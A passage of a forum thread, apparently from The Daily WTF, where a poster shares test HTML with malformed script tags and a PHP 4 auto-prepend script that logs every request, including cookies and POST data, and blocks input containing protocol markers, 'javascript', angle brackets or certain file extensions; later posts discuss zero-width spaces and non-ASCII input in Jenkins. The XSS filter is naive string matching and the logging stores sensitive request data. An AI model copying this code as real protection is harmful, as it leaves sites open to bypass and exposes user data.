    <div> Test1 </div>
    < div> Test2 </div>
    <script>
    /* Test3 some script> */
    </script>
    < script>
    /* Test4 some script> */
    </script>
    </html>
    

    (As plain text in editor)

    <html>
    Test1
    < div> Test2 <script> /* Test3 some script> */ </script> < script> /* Test4 some script> */ </script> </html>

    CBA to do screen shots for you, but I noticed this as I was writing the post, so I included it here (pre "reply" submit thought: I wonder how it will actually appear in the post)



  • Edit: Oh, yeah. So part of my "solution" was to parse everything uploaded to the server. One rule was: "if an opening caret was not followed by space, strip every thing out until you get a closing caret"

    :WTF: Huh, I am absolutely certain I clicked the "edit" thingy to my post and not the "reply"



  • Because I am still proud of it:
    Note: This is PHP 4.xx, it is an "auto prepend" script. I.e. it is automatically prepened to any PHP script request.

    <?php
    	$rows = mysql_fetch_array($siteResult);
    	$thisServer = $DBArray[$serverID]["host"];
    	$callingScript = trim(strtolower($_SERVER['PHP_SELF']));
    	$thisSite =gethostbyname($_SERVER['SERVER_NAME']).":".$_SERVER['SERVER_PORT'];
    	$thisMethod = $_SERVER['REQUEST_METHOD'];
    	$thisRequest = $_SERVER['REQUEST_URI'];
    	if(array_key_exists("HTTP_USER_AGENT",$_SERVER)){$thisAgent = $_SERVER['HTTP_USER_AGENT'];}
    	if(empty($thisAgent)){$thisAgent = "*** No Agent ***";}
    	if(array_key_exists("HTTP_REFERER",$_SERVER)){$thisReferer = $_SERVER['HTTP_REFERER'];}
    	if(empty($thisReferer)){$thisReferer = "*** No Referer ***";}
    	if(array_key_exists("REMOTE_ADDR",$_SERVER)){$thisClient = $_SERVER['REMOTE_ADDR'];}
    	if(empty($thisClient)){$thisClient = "*** No Client ***";}
    
    	// Delete COOKIE "data" for those that are not [REDACTED] Related.
    	$cookieArray = array("cartId","PHPSESSID","currency","AHASH","account");
    	foreach($_COOKIE as $key=>$value)
    	{
    		if(!in_array($key, $cookieArray))
    		{
    			$_COOKIE[$key] = "";
    		}
    	}
    	reset($_COOKIE);
    
    	// Record all access
    	$checkArray = array();
    	$checkArray['cookies'] = $_COOKIE;
    	$checkArray['post_data'] = $_POST;
    	$checkArray['get_data'] = $_GET;
    	$rawCompositeData = $checkArray;
    	$compositData = mysql_real_escape_string(serialize($rawCompositeData));
    	$what = mysql_real_escape_string($thisMethod." | ".$thisSite." | ".$thisRequest." | ".$compositData);
    	$who = mysql_real_escape_string($thisClient." | ".$thisReferer);
    	$how = mysql_real_escape_string($thisAgent);
    	$query = "insert into [redacted].all_access values(NULL,'$thisServer',NOW(),'$what','$who','$how')";
    	$result = mysql_query($query,$controlDB);
    	if(!$result)
    	{
    		$why = mysql_real_escape_string(mysql_error());
    		$what = mysql_real_escape_string($query);
    		$who = $thisSite;
    		$errorQuery = "insert into mysql_error values(NULL,NOW(),'$why','$what','$who')";
    		$errorResult = mysql_query($errorQuery,$controlDB);
    	}
    
    	// Cross Site Scripting Checks
    	$testData = rawurldecode(serialize($rawCompositeData));
    	$trapped = false;
    	$trappedMessage = "An undefined Error occurred that may be an attempt to exploit your [REDACTED] Web Site with one or more Cross Site Scripting (XSS) techniques.";
    	$trappedCondition = "Unknown";
    	$trappedHTTPCode = "403";
    	$trappedLocation = 0;
    	$trappedContext = "";
    	$dissallowedTypes = array(".inc",".pl",".exe");
    
    	// Exclusions
    	$exclusionArray = array(
    		"/[redacted]/admin.php",
    		"/[redacted]/home.php",
    		"[redacted]/404redirect.php",
    		"/[redacted]/filebrowser_ajax.php",
    		"/[redacted]/robots_ajax.php",
    		"/[redacted]/configuration.php",
    		"/[redacted]/option_config.php",
    
    
    		"dummy content"
    		);
    
    	// Test for Protocols
    	$XSSPresent = strpos($testData,"://");
    	if(($XSSPresent !== false)&&(!$trapped))
    	{
    		$trapped = true;
    		$trappedMessage = "An unexpected Internet Protocol Marker that could be associated with an attempt at Cross Site Scripting (XSS)";
    		$trappedCondition = "Unexpected Protocol";
    		$trappedHTTPCode = "403.1";
    		$trappedLocation = $XSSPresent;
    	}
    
    	// Test for "script"
    	$XSSPresent = stripos($testData,"javascript");
    	if(($XSSPresent !== false)&&(!$trapped))
    	{
    		$trapped = true;
    		$trappedMessage = "An attempt to inject a Scripting Instruction that could be associated with an attempt at Cross Site Scripting (XSS)";
    		$trappedCondition = "Script Injection";
    		$trappedHTTPCode = "403.2";
    		$trappedLocation = $XSSPresent;
    	}
    
    	// Test for "Tags"
    	if(!$trapped)
    	{
    		$testXSSPresent = true;
    		$thisOffset = 0;
    		while($testXSSPresent != false)
    		{
    			$testXSSPresent = stripos($testData, "<", $thisOffset);
    			if($testXSSPresent !== false)
    			{
    				$newOffset = $testXSSPresent + 4; 
    				// Exclude HTML Comment
    				if(substr($testData, $testXSSPresent, 4) != "<!--")
    				{
    					$XSSPresent = $testXSSPresent;
    				}
    				$thisOffset = $newOffset;
    			}
    		}
    		if($XSSPresent !== false)
    		{
    			$trapped = true;
    			$trappedMessage = "An attempt to inject Markup Code that could be associated with an attempt at Cross Site Scripting (XSS)";
    			$trappedCondition = "Markup";
    			$trappedHTTPCode = "403.3";
    			$trappedLocation = $XSSPresent;
    		}
    	}
    
    	// Test for "files"
    	foreach($dissallowedTypes as $value)
    	{
    		$XSSPresent = stripos($thisRequest,$value);
    		if(($XSSPresent !== false)&&(!$trapped))
    		{
    			$trapped = true;
    			$trappedMessage = "An attempt was made to Execute an Unauthorised Program that could be associated with an attempt at Cross Site Scripting (XSS)";
    			$trappedCondition = "Execution - $value";
    			$trappedHTTPCode = "403.4";
    			$trappedLocation = $XSSPresent;
    		}
    	}
    
    	if(in_array($callingScript, $exclusionArray)){$trapped = false;}
    	reset($_REQUEST);
    	if($trapped)
    	{
    		$trappedStart = $trappedLocation - 20;
    		if($trappedStart < 0){$trappedStart = 0;}
    		$trappedContext = substr($compositData, $trappedStart, 150);
    		$requestData = $compositData;
    		$serverData = mysql_real_escape_string(serialize($_SERVER));
    		$query = "insert into site_hacks values(NULL, NOW(), '$trappedCondition', ' ".mysql_real_escape_string($trappedContext)."', '$thisSite', '$requestData' ,'$serverData')";
    		$result = mysql_query($query,$controlDB);
    		$errorRef = mysql_insert_id();
    		if(!$result)
    		{
    			$why = mysql_real_escape_string(mysql_error());
    			$what = mysql_real_escape_string($query);
    			$who = $thisSite;
    			$errorQuery = "insert into mysql_error values(NULL,NOW(),'$why','$what','$who')";
    			$errorResult = mysql_query($errorQuery,$controlDB);
    		}
    		header("HTTP/1.0 $trappedHTTPCode $trappedMessage");
    		echo '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
    <html>
    	<head>
    		<title>The Requested Page cannot be displayed</title>
    		<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    		<style type="text/css">
    			body{font-size:12px; font-family:verdana, arial, sans-serif; margin:0px; padding:0px;}
    			.example_code{font-family:monospace; font-size:14px; color:#000099; text-align:left;}
    			.italic_text{font-style:italic;}
    			.bold_text{font-weight:bold;}
    			#main_container{position:relative; width:600px; text-align:justify; margin-left:auto; margin-right:auto;}
    			h1{font-size:14px; margin:10px 0px 10px 0px;}
    			h2{font-size:12px;}
    			a:link{color: red}
    			a:visited{color: maroon}
    			#report_container{position:relative; width:600px; padding-left:20px; padding-right:20px;}
    			.report_line{position:relative; width:560px; height:20px; line-height:20px;}
    			.report_prompt{float:left; width:120px; text-align:right; padding-right:3px; font-weight:bold;}
    			.report_data{float:left; width:430px;}
    		</style>
    	</head>
    	<body>
    		<div id="main_container">
    			<h1>The Requested Page cannot be displayed</h1>
    			<p>Sorry, but there is a problem with the page you requested:</p>
    			<p>'.$trappedMessage.' was found in the Data returned to the Web Server.</p>
    			<p>This Request along with such information as the Client IP and Browser Details, has been logged and recorded in our Database.</p>
    			<hr>
    			<p>Please try again without</p>
    			<ul>
    				<li>Including any &quot;Protocol Markers&quot; such as <span class="example_code">http://</span>, or <span class="example_code">mailto://</span> etc.</li>
    				<li>Including words or phrases like <span class="example_code">javascript:</span> or <span class="example_code">script</span> etc.</li>
    				<li>Including requests for unauthorised &quot;File Types&quot; such as <span class="example_code">.pl</span>, <span class="example_code">.asp</span>, or <span class="example_code">.exe</span> etc</li>
    				<li>Including &quot;Literals&quot; such as <span class="example_code">&gt;</span> or <span class="example_code">&lt;</span>. If these are part of legitimate text, try using their HTML Entity Code i.e. <span class="italic_text">&amp;gt;</span> or <span class="italic_text">&amp;lt;</span> etc.</li>
    			</ul>
    			<p>Please accept our apologies for any inconvenience that this has caused. Depending on the exact details, any Transaction you were the process of making would have been cancelled or should have completed successfully. Thank you.</p>
    			<hr>
    			<h2>HTTP error '.$trappedHTTPCode.' - '.$trappedMessage.'</h2>
    			<hr>
    			<p>If this message persists, or you think that it is in error. Please contact the Web Site Owner with the information detailed below so that they can notify the [redacted] Support Team. Thank you.</p>
    			<div id="report_container">
    				<div class="report_line"><div class="report_prompt">URL Address: </div><div class="report_data">'. htmlspecialchars($thisSite.$thisRequest,ENT_QUOTES).'</div></div>
    				<div class="report_line"><div class="report_prompt">Trap Condition: </div><div class="report_data">'.$trappedCondition.'</div></div>
    				<div class="report_line"><div class="report_prompt">Trap Location: </div><div class="report_data">'.$trappedLocation.'</div></div>
    				<div class="report_line"><div class="report_prompt">Trap Context: </div><div class="report_data">'.htmlspecialchars($trappedContext,ENT_QUOTES).'</div></div>
    				<div class="report_line"><div class="report_prompt">Trap Reference: </div><div class="report_data">'.$errorRef.'</div></div>
    			</div>
    		</div>
    	</body>
    </html>';
    		$timeToDie = true;
    	}
    	if($timeToDie){die();}
    ?>


  • […] what happens when you try to Tweet a zero-width space (U+200B) on Twitter.

    Funny. Just a weak or two ago we had a problem with that very character. When Jenkins renders the list of jobs, it inserts bunch of them in the descriptions, presumably to adjust line breaks. When a colleague copied part of the description into parameters of the next job, it got on input of a script that uploads the artefacts. And that failed, because it didn't expect non-ascii. There normally isn't much reason for giving it non-ascii; it just got it by coincidence.

    Just shows that users can, pretty easily, unknowingly type that by copy&paste.



  • @Bulb said:

    There normally isn't much reason for giving it non-ascii; it just got it by coincidence.

    FUCK YOU JENKINS WHY CAN'T I HAVE AN Ą IN A NAME



  • Well, it was just internal script and internal description of the release. Jenkins itself accepts unicode just fine. Though the first time it failed, it was me who wrote beta as β.



  • Ask @Gaska



  • @Bulb said:

    Well, it was just internal script and internal description of the release. Jenkins itself accepts unicode just fine.

    Considering that 99% of all Jenkins instances are in 99% made of internal scripts, that's kinda a valid complaint on @Maciejacośtam's part.

    @Maciejasjmj said:

    FUCK YOU JENKINS WHY CAN'T I HAVE AN Ą IN A NAME

    Bonus WTF: I couldn't put grammatically correct sentence as my "full name" field because of length limit. That's also why it mentions "name" and not "username", which I originally wanted to use. Also, that's why it has no punctuation whatsoever - under normal circumstances, I would put at least four shebangsinterrobangs at the end.


Log in to reply
 

Looks like your connection to What the Daily WTF? was lost, please wait while we try to reconnect.